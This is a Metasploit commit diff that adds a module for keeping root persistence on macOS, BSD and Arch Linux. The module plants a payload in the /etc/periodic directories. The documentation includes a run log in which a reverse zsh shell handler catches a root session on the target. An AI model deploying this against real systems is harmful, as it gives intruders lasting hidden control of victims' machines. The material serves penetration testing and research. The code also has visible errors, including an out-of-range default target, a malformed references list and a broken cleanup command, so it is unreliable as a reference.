Land #19903, adds module for periodic script persistence

msutovsky-r7 · web-flow · commit 5d59fbd333e2 · 2025-08-29T20:12:12.000+02:00
Add OSX Periodic Script Peristence
diff --git a/documentation/modules/exploit/multi/local/periodic_script_persistence.md b/documentation/modules/exploit/multi/local/periodic_script_persistence.md
@@ -0,0 +1,62 @@
+## Description
+
+This module provides a persistence mechanism on OSX, BSD and Arch Linux 
+using periodic scripts. The modules will write a script to `/etc/periodic
+/daily/`, `/etc/periodic/weekly/` or `/etc/periodic/monthly/`. This 
+script will then execute a payload which is written by default to `/tmp/`.
+
+## Verification Steps
+
+1. Obtain a session with super user privilleges, only the root 
+user has write permissions to `/etc/periodic/`
+2. Do: `use exploit/multi/local/periodic_script_persistence`
+3. Do: `set session #`
+4. Do: `set target #`
+5. Do: `set payload #`
+6. Do: `set verbose true`
+7. Do: `expoit`
+
+## Options
+
+### PERIODIC_DIR
+
+Periodic Directory to write script eg. /etc/periodic/daily
+
+### PERIODIC_SCRIPT_NAME
+
+Name of periodic script
+
+
+
+## Scenarios
+```
+msf6 exploit(multi/local/periodic_script_persistence) > set session 1
+session => 1
+msf6 exploit(multi/local/periodic_script_persistence) > run verbose=true 
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. /etc/periodic/daily/ is writable
+[*] Writing '/etc/periodic/daily/jX3dG9' (118 bytes) ...
+[*] Succesfully wrote periodic script to /etc/periodic/daily/jX3dG9.
+[*] Cleanup command 'sudo rm/etc/periodic/daily/jX3dG9'
+msf6 exploit(multi/local/periodic_script_persistence) > handler -p cmd/unix/reverse_zsh -P 4444 -H ens39
+[*] Payload handler running as background job 4.
+
+msf6 exploit(multi/local/periodic_script_persistence) > [*] Started reverse TCP handler on 192.168.168.219:4444 
+[*] Command shell session 6 opened (192.168.168.219:4444 -> 192.168.168.175:49190) at 2025-08-29 17:49:54 +0200
+msf6 exploit(multi/local/periodic_script_persistence) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information           Connection
+  --  ----  ----                 -----------           ----------
+  1         meterpreter x64/osx  root @ mss-Mac.local  192.168.168.219:4242 -> 192.168.168.175:49165 (192.168.168.175)
+  6         shell cmd/unix                             192.168.168.219:4444 -> 192.168.168.175:49190 (192.168.168.175)
+
+msf6 exploit(multi/local/periodic_script_persistence) > sessions 6
+[*] Starting interaction with 6...
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
+```
diff --git a/modules/exploits/multi/local/periodic_script_persistence.rb b/modules/exploits/multi/local/periodic_script_persistence.rb
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Periodic Script Persistence',
+        'Description' => %q{
+          This module will achieve persistence by writing a script to the /etc/periodic directory.
+          According to The Art of Mac Malware no such malware species persist in this manner (2024).
+          This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'gardnerapp',
+          'msutovsky-r7'
+        ],
+        'References' => [
+          [
+            'URL', 'https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf',
+            'URL', 'https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/'
+          ]
+        ],
+        'DisclosureDate' => '2012-04-01',
+        'Privileged' => true,
+        'Platform' => %w[bsd unix osx],
+        'Targets' => [
+          [ 'OSX', { 'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64], 'Platform' => 'osx' } ],
+          [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ],
+          [ 'Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],
+          [ 'Bsd', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'bsd' }]
+        ],
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
+        'DefaultTarget' => 4,
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptEnum.new('PERIODIC_DIR', [true, 'Periodic Directory to write script eg. /etc/periodic/daily', 'daily', %w[daily weekly monthly]]),
+      OptString.new('PERIODIC_SCRIPT_NAME', [false, 'Name of periodic script']),
+    ])
+  end
+
+  def check
+    periodic = "/etc/periodic/#{datastore['PERIODIC_DIR']}/"
+
+    return CheckCode::Vulnerable "#{periodic} is writable" if writable? periodic
+
+    CheckCode::Safe "Unable to write to #{periodic}"
+  end
+
+  def write_periodic_script(payload_content)
+    periodic_dir = "/etc/periodic/#{datastore['PERIODIC_DIR']}/"
+
+    periodic_script_name = datastore['PERIODIC_SCRIPT_NAME'].blank? ? Rex::Text.rand_text_alphanumeric(rand(6..13)) : datastore['PERIODIC_SCRIPT_NAME']
+    periodic_script = File.join(periodic_dir, periodic_script_name)
+
+    @clean_up_rc << periodic_script.to_s
+
+    fail_with(Failure::UnexpectedReply, "Unable to write #{periodic_script}") unless upload_and_chmodx(periodic_script, payload_content)
+
+    print_status "Succesfully wrote periodic script to #{periodic_script}."
+  end
+
+  def exploit
+    @clean_up_rc = 'sudo rm'
+
+    if target['Arch'] == ARCH_PYTHON
+      print_status 'Getting python version & path.'
+
+      python = cmd_exec('which python3 || which python2 || which python')
+
+      fail_with(Failure::PayloadFailed, 'Unable to find python version. ') if python.blank? || !file?(python)
+
+      print_good "Found python path #{python}"
+
+      payload_bin = "#{python}\n" + payload.encoded
+    elsif target['Arch'] == ARCH_CMD
+      payload_bin = "#!/usr/bin/env #{cmd_exec('echo ${SHELL}')}\n" + payload.encoded
+    else
+      payload_bin = generate_payload_exe
+    end
+
+    write_periodic_script payload_bin
+
+    print_status("Cleanup command '#{@clean_up_rc}'")
+  end
+end
